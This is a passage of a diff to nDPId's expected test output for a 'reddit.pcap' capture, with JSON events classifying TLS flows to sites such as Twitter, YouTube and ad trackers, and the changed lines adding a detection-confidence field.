-00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01357{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}}
-00980{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
